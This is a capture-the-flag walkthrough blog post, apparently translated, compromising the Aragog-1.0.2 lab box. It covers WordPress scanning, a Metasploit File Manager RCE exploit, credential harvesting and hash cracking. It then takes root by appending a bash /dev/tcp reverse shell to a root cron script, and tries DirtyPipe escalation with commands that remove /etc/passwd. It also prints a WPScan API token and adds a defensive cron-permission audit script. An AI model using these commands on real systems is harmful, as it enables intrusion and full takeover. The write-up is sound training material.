Taste of Life series - [One Target Machine a Day]: Aragog-1.0.2
2022-12-14 14:45:51 Author: 猫因的安全

One Target Machine a Day: Aragog-1.0.2

Target machine: 192.168.31.225

Attacker machine (Kali): 192.168.31.19

Learn by practicing, fill in the details, hit the pain points head-on, make up for what's been forgotten. Sounds so nice, cnm.

Besides, sitting around over the break is boring; I learned nothing all semester and my skills have turned into a pile of crap.

IcMl0x824

Rustscan

┌──(root㉿kali)-[~/Desktop]
└─# rustscan
.----. .-. .-. .----..---. .----. .---.   .--. .-. .-.
| {} }| { } |{ {__ {_   _}{ {__ / ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | | .-._} }\     }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----'  `---' `-' `-'`-' `-'

Standard scan:

rustscan -a 192.168.31.225 --ulimit 5000

Scan with nmap options passed through:

rustscan -a 192.168.31.225 -p 22,80 -- -A 

Dirsearch

┌──(root㉿kali)-[~/Desktop]
└─# dirsearch -u 192.168.31.225
_|. _ _ _ _ _ _|_   v0.4.2                            
(_||| _) (/_(_|| (_| )                                    

WPScan

Register and get an API key before scanning if you can; it makes a big difference.

wpscan --url 192.168.31.225/blog --api-token=9VYnNxYKKsOSrXS1gwJWAu3ExS5pq4GZQIVWatREkI8

Enumerate users

--enumerate u

Brute force (wpscan 3 takes the password list via -P/--passwords)

-e u -P <wordlist>

Scan for vulnerable plugins

--enumerate vp

Scan for vulnerable themes

--enumerate vt

Scan for vulnerable (timthumb) files

--enumerate tt

Note the option

--plugins-detection aggressive   
Three choices: mixed, passive (default), aggressive

Combined command

--enumerate vp,vt,tt,u --plugins-detection aggressive
wpscan --url 192.168.31.225/blog --api-token=9VYnNxYKKsOSrXS1gwJWAu3ExS5pq4GZQIVWatREkI8 -e p --plugins-detection aggressive

[!] Title: File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE

MSF

search wordpress file manager
msf6 exploit(multi/http/wp_file_manager_rce) > set TARGETURI /blog
TARGETURI => /blog
msf6 exploit(multi/http/wp_file_manager_rce) > set rhosts http://192.168.31.225
rhosts => http://192.168.31.225
msf6 exploit(multi/http/wp_file_manager_rce) > set lhost 192.168.31.19
lhost => 192.168.31.19
msf6 exploit(multi/http/wp_file_manager_rce) > run

python

First, get a tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

We know that with Python's pty module we can spawn a native terminal, then press Ctrl+Z, run stty raw -echo;fg, and finally reset to get a fully interactive terminal. But suppose the target has no Python; how do we get the same effect?

Haven't run into that on this box yet; will deal with it when I do.

Where the dirt hides

The MySQL username and password of a WordPress site are recorded in config-default.php in the /etc/wordpress directory.

www-data@<target>:/etc/wordpress$ cat config-default.php
cat config-default.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>

MySQL

If you can't connect from outside, connect from inside the shell.

mysql -uroot -pmySecr3tPass -h 127.0.0.1 -P 3306

WordPress keeps its usernames and password hashes in the wp_users table.

hagrid98 | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin  | hagrid98@localhost.local | | 2021-03-31 14:21:02 | | WP-Admin  |

Crack the MD5-based hash

Result: hagrid98 | password123

SSH

ssh hagrid98@192.168.31.225

Privilege escalation: no luck

hagrid98@<target>:~$ sudo
-bash: sudo: command not found
hagrid98@<target>:~$ history
   1  ls
   2 whoami
   3  sudo
   4 history

Use a script

Linux_Exploit_Suggester.sh

python

Start an HTTP server

┌──(root㉿kali)-[~]
└─# python -m http.server 2333    
Serving HTTP on 0.0.0.0 port 2333 (http://0.0.0.0:2333/) ...

wget

hagrid98@<target>:~$ wget 192.168.31.19:2333/Desktop/linux-exploit-suggester.sh
--2022-12-14 10:06:06-- http://192.168.31.19:2333/Desktop/linux-exploit-suggester.sh
Connecting to 192.168.31.19:2333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90917 (89K) [text/x-sh]
Saving to: ‘linux-exploit-suggester.sh’

linux-exploit-suggeste 100%[==========================>]  88.79K  --.-KB/s    in 0s      

2022-12-14 10:06:06 (477 MB/s) - ‘linux-exploit-suggester.sh’ saved [90917/90917]

hagrid98@<target>:~$ ls
horcrux1.txt linux-exploit-suggester.sh
hagrid98@<target>:~$

chmod

chmod 777 linux-exploit-suggester.sh

Privilege-escalation scan results

[+] [CVE-2019-13272] PTRACE_TRACEME

  Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
  Exposure: highly probable
  Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
  Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
  ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
  Comments: Requires an active PolKit agent.

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

  Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
  Exposure: less probable
  Tags: ubuntu=20.04{kernel:5.8.0-*}
  Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
  ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
  Comments: ip_tables kernel module must be loaded

Running the script turned up two CVEs; in actual testing neither one escalated privileges.

[CVE-2019-13272]

In the Linux kernel, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship. This allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where the parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is the incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME to obtain root. It can only be exploited from a graphical session, so in practice it's of limited use.

[CVE-2021-22555]

On July 16, 2021, 360CERT observed that the overseas security researcher @theflow had published an analysis of the CVE-2021-22555 Linux Netfilter privilege-escalation vulnerability. Vulnerability ID: CVE-2021-22555; severity: high; score: 7.8.

The Linux Netfilter module is a framework in the kernel for handling network packets; the well-known iptables and nftables tools are built on Netfilter. The vulnerability escalates privileges through flawed logic in Netfilter's use of memcpy and memset.

Gather information with pspy

pspy - unprivileged Linux process snooping

pspy is a command-line tool designed to snoop on processes without needing root permissions. It lets you see commands run by other users, cron jobs, etc. as they execute. Great for enumerating Linux systems in CTFs. Also great for showing your colleagues why passing secrets as command-line arguments is a bad idea.

The tool gathers its information from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

Same old approach: drop it on the target and run it.

wget 192.168.31.19:2333/Desktop/pspy64.sh
hagrid98@<target>:~$ ./pspy64.sh
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


    ██▓███   ██████ ██▓███ ▓██   ██▓
  ▓██░ ██▒▒██   ▒ ▓██░ ██▒▒██ ██▒
  ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
  ▒██▄█▓▒ ▒ ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
  ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
  ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
  ░▒ ░     ░ ░▒ ░ ░░▒ ░     ▓██ ░▒░
  ░░       ░ ░ ░ ░░       ▒ ▒ ░░  
                  ░           ░ ░    
                              ░ ░    

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/12/14 10:15:53 CMD: UID=33   PID=996   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33   PID=995   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33   PID=994   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33   PID=990   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33   PID=989   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0    PID=9     |
2022/12/14 10:15:53 CMD: UID=0    PID=8     |
2022/12/14 10:15:53 CMD: UID=33   PID=633   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33   PID=632   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33   PID=629   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0    PID=6     |
2022/12/14 10:15:53 CMD: UID=0    PID=59     |
2022/12/14 10:15:53 CMD: UID=107  PID=529   | /usr/sbin/mysqld
2022/12/14 10:15:53 CMD: UID=0    PID=50     |
2022/12/14 10:15:53 CMD: UID=0    PID=49     |
2022/12/14 10:15:53 CMD: UID=0    PID=481   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0    PID=48     |
2022/12/14 10:15:53 CMD: UID=0    PID=425   | /usr/sbin/sshd -D
2022/12/14 10:15:53 CMD: UID=0    PID=415   | /sbin/agetty -o -p -- \u --noclear tty1 linux                                                                                        
2022/12/14 10:15:53 CMD: UID=0    PID=4     |
2022/12/14 10:15:53 CMD: UID=0    PID=365   | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                                              
2022/12/14 10:15:53 CMD: UID=0    PID=324   | /usr/sbin/rsyslogd -n -iNONE
2022/12/14 10:15:53 CMD: UID=0    PID=319   | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant                                                                                    
2022/12/14 10:15:53 CMD: UID=104  PID=318   | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                            
2022/12/14 10:15:53 CMD: UID=0    PID=317   | /usr/sbin/cron -f
2022/12/14 10:15:53 CMD: UID=0    PID=316   | /lib/systemd/systemd-logind
2022/12/14 10:15:53 CMD: UID=0    PID=30     |
2022/12/14 10:15:53 CMD: UID=0    PID=3     |
2022/12/14 10:15:53 CMD: UID=0    PID=29     |
2022/12/14 10:15:53 CMD: UID=101  PID=285   | /lib/systemd/systemd-timesyncd
2022/12/14 10:15:53 CMD: UID=0    PID=28     |
2022/12/14 10:15:53 CMD: UID=0    PID=275   |
2022/12/14 10:15:53 CMD: UID=0    PID=274   |
2022/12/14 10:15:53 CMD: UID=1000 PID=2705   | ./pspy64.sh
2022/12/14 10:15:53 CMD: UID=0    PID=2701   |
2022/12/14 10:15:53 CMD: UID=0    PID=27     |
2022/12/14 10:15:53 CMD: UID=0    PID=2688   |
2022/12/14 10:15:53 CMD: UID=0    PID=26     |
2022/12/14 10:15:53 CMD: UID=0    PID=25     |
2022/12/14 10:15:53 CMD: UID=0    PID=24     |
2022/12/14 10:15:53 CMD: UID=0    PID=236   | /lib/systemd/systemd-udevd
2022/12/14 10:15:53 CMD: UID=0    PID=23     |
2022/12/14 10:15:53 CMD: UID=0    PID=22     |
2022/12/14 10:15:53 CMD: UID=0    PID=217   | /lib/systemd/systemd-journald
2022/12/14 10:15:53 CMD: UID=0    PID=21     |
2022/12/14 10:15:53 CMD: UID=0    PID=20     |
2022/12/14 10:15:53 CMD: UID=0    PID=2     |
2022/12/14 10:15:53 CMD: UID=0    PID=19     |
2022/12/14 10:15:53 CMD: UID=0    PID=187   |
2022/12/14 10:15:53 CMD: UID=0    PID=186   |
2022/12/14 10:15:53 CMD: UID=0    PID=184   |
2022/12/14 10:15:53 CMD: UID=0    PID=18     |
2022/12/14 10:15:53 CMD: UID=0    PID=17     |
2022/12/14 10:15:53 CMD: UID=0    PID=16     |
2022/12/14 10:15:53 CMD: UID=0    PID=153   |
2022/12/14 10:15:53 CMD: UID=0    PID=15     |
2022/12/14 10:15:53 CMD: UID=0    PID=14     |
2022/12/14 10:15:53 CMD: UID=1000 PID=1337   | -bash
2022/12/14 10:15:53 CMD: UID=1000 PID=1336   | sshd: hagrid98@pts/2
2022/12/14 10:15:53 CMD: UID=1000 PID=1323   | (sd-pam)
2022/12/14 10:15:53 CMD: UID=1000 PID=1322   | /lib/systemd/systemd --user
2022/12/14 10:15:53 CMD: UID=0    PID=1319   | sshd: hagrid98 [priv]
2022/12/14 10:15:53 CMD: UID=0    PID=13     |
2022/12/14 10:15:53 CMD: UID=0    PID=12     |
2022/12/14 10:15:53 CMD: UID=33   PID=1186   | /bin/bash
2022/12/14 10:15:53 CMD: UID=33   PID=1185   | python3 -c import pty;pty.spawn("/bin/bash")                                                                                        
2022/12/14 10:15:53 CMD: UID=33   PID=1184   | /bin/sh
2022/12/14 10:15:53 CMD: UID=33   PID=1183   | sh -c /bin/sh  
2022/12/14 10:15:53 CMD: UID=33   PID=1182   | python3
2022/12/14 10:15:53 CMD: UID=33   PID=1181   | /bin/bash
2022/12/14 10:15:53 CMD: UID=33   PID=1180   | python3 -c import pty;pty.spawn("/bin/bash")                                                                                        
2022/12/14 10:15:53 CMD: UID=33   PID=1173   | /bin/sh
2022/12/14 10:15:53 CMD: UID=33   PID=1172   |
2022/12/14 10:15:53 CMD: UID=33   PID=1168   | python3
2022/12/14 10:15:53 CMD: UID=33   PID=1162   | /bin/sh
2022/12/14 10:15:53 CMD: UID=33   PID=1161   | sh -c /bin/sh  
2022/12/14 10:15:53 CMD: UID=0    PID=113   |
2022/12/14 10:15:53 CMD: UID=33   PID=1113   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0    PID=111   |
2022/12/14 10:15:53 CMD: UID=0    PID=110   |
2022/12/14 10:15:53 CMD: UID=0    PID=11     |
2022/12/14 10:15:53 CMD: UID=0    PID=108   |
2022/12/14 10:15:53 CMD: UID=0    PID=107   |
2022/12/14 10:15:53 CMD: UID=0    PID=105   |
2022/12/14 10:15:53 CMD: UID=0    PID=104   |
2022/12/14 10:15:53 CMD: UID=33   PID=1023   | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0    PID=101   |
2022/12/14 10:15:53 CMD: UID=0    PID=10     |
2022/12/14 10:15:53 CMD: UID=0    PID=1     | /sbin/init
2022/12/14 10:16:01 CMD: UID=0    PID=2713   | /usr/sbin/CRON -f
2022/12/14 10:16:01 CMD: UID=0    PID=2714   | /usr/sbin/CRON -f
2022/12/14 10:16:01 CMD: UID=0    PID=2715   | /bin/sh -c bash -c "/opt/.backup.sh"
2022/12/14 10:16:01 CMD: UID=0    PID=2716   | /bin/bash /opt/.backup.sh
2022/12/14 10:17:01 CMD: UID=0    PID=2717   | /usr/sbin/CRON -f
2022/12/14 10:17:01 CMD: UID=0    PID=2718   | /usr/sbin/CRON -f
2022/12/14 10:17:01 CMD: UID=0    PID=2719   | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly    

Spotted the problem

2022/12/14 10:16:01 CMD: UID=0    PID=2716   | /bin/bash /opt/.backup.sh

This script runs as UID 0. What does it do? Let's open it.

hagrid98@<target>:~$ cat /opt/.backup.sh
#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

So it's root running a scheduled task.

The gist of the script: copy the uploaded files into a directory under /tmp. Since it runs every so often, it has presumably been registered as a scheduled task, so we can write a reverse-shell command into it and let the cron job execute it.

bash -c 'exec bash -i &>/dev/tcp/192.168.31.19/4444 <&1'

echo

hagrid98@<target>:/opt$ cd /tmp
hagrid98@<target>:/tmp$ echo "bash -c 'exec bash -i &>/dev/tcp/192.168.31.19/4444 <&1'" >> /opt/.backup.sh
hagrid98@<target>:/tmp$ ls
systemd-private-9fb8f7c33ac142689f44e69c12de8dcf-apache2.service-Y0d53W
systemd-private-9fb8f7c33ac142689f44e69c12de8dcf-systemd-timesyncd.service-I7geaz
tmp_wp_uploads

root

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.31.19] from (UNKNOWN) [192.168.31.225] 60168
bash: cannot set terminal process group (2764): Inappropriate ioctl for device
bash: no job control in this shell
root@<target>:~# whoami
whoami
root
root@<target>:~#
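The whole escalation path on this box is a root cron job that executes a script a low-privilege user can modify. As an added defensive check (not part of the original write-up), the following Python audits crontab entries for referenced scripts that are group/world-writable or that sit in a group/world-writable directory; the crontab text and script paths built in demo() are constructed fixtures, not files from the box.

```python
"""Audit cron jobs for scripts that a non-root user could modify, the weakness
this walkthrough used: a root cron job running a writable /opt/.backup.sh."""
import os
import re
import stat
import tempfile

# A user-crontab line: five schedule fields (or an @keyword), then the command.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<cmd>.+)$")
ABS_PATH = re.compile(r"/[\w./-]+")
OTHERS_WRITE = stat.S_IWGRP | stat.S_IWOTH


def weak_perms(path):
    """Reasons a user other than the owner could change what cron executes."""
    reasons = []
    if os.stat(path).st_mode & OTHERS_WRITE:
        reasons.append("script is group/world-writable")
    if os.stat(os.path.dirname(path)).st_mode & OTHERS_WRITE:
        reasons.append("parent directory is group/world-writable")
    return reasons


def audit_crontab(text):
    """Return [(script_path, reasons)] for every weak script a job references."""
    findings = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue  # blank line, comment, or VAR=value assignment
        match = CRON_LINE.match(line)
        if not match:
            continue
        for path in ABS_PATH.findall(match.group("cmd")):
            reasons = weak_perms(path) if os.path.isfile(path) else []
            if reasons:
                findings.append((path, reasons))
    return findings


def demo():
    """Constructed fixture (not from the box): a world-writable backup script
    next to a properly protected one, both scheduled from a crontab."""
    d = tempfile.mkdtemp()  # created 0700, so only the scripts' own bits matter
    bad, good = os.path.join(d, ".backup.sh"), os.path.join(d, "rotate.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/bash\ncp -r /var/www/uploads /tmp/tmp_wp_uploads\n")
        os.chmod(path, mode)
    crontab = f'SHELL=/bin/bash\n* * * * * bash -c "{bad}"\n0 * * * * {good}\n'
    return audit_crontab(crontab)
```

Run audit_crontab over the output of crontab -l (or the files under /etc/cron.d) on a real host; any finding means someone without root can choose what root runs next minute.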

A universal exploit?

Thanks, bro.

DirtyPipe exploitation (CVE-2022-0847)

At the start of the month, overseas security researchers disclosed a new high-severity vulnerability in the Android/Linux kernel, CVE-2022-0847. Because it resembles the famous DirtyCOW vulnerability, it has been named DirtyPipe. The bug was introduced by a patch in upstream Linux kernel 5.8 and affects every operating system built on the Linux kernel; it is also a serious threat on the newest phone platform, Android 12 with kernel 5.10. Our internal research found that DirtyPipe, combined with other exploitation techniques, can achieve a Mangekyō Sharingan-like effect in practice.

See this guy's article for details: https://dirtypipe.cm4all.com/

wget 192.168.31.19:2333/Desktop/CVE-2022-0847/Dirty-Pipe.sh

hagrid98@<target>:~$ chmod 777 Dirty-Pipe.sh
hagrid98@<target>:~$ ./Dirty-Pipe.sh
./Dirty-Pipe.sh: line 161: gcc: command not found
/etc/passwd已备份到/tmp/passwd
./Dirty-Pipe.sh: line 169: ./exp: No such file or directory

# restore the original passwd file
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
Password:
root
^[[B^[[B^[[B^[[B^[[B^[[Bsu: Authentication failure

hagrid98@<target>:~$ rm -rf /etc/passwd
rm: cannot remove '/etc/passwd': Permission denied
hagrid98@<target>:~$ mv /tmp/passwd /etc/passwd
mv: replace '/etc/passwd', overriding mode 0644 (rw-r--r--)?

Only now did I notice missing dependencies.

To compile the exploit successfully, you need GCC installed
emmmm

See here for how to install gcc on Linux as a non-root user:

https://blog.csdn.net/u014513863/article/details/128044993

If there are no permissions and no dependencies,

download a gcc package with wget and install it by hand; apparently that can work.

Try other scripts

wget 192.168.31.19:2333/Desktop/dirty.py

wget 192.168.31.19:2333/Desktop/traitor-amd64

As you can see, I tried basically everything that could be used for DirtyPipe; still not ideal, and every attempt ended in failure.

I'm just too damn bad at this. Let's leave it there!

Closing remarks

This box: Aragog-1.0.2

Objective: escalate to root via a locally scheduled script


Article source: http://mp.weixin.qq.com/s?__biz=Mzk0NjMyNDcxMg==&mid=2247497653&idx=1&sn=dcfcdabd205c06d9c95283dbe036930a&chksm=c3056232f472eb24330677168caba1c409d1b84409d7353a79d3c6632a24bbcecc80bfa53601#rd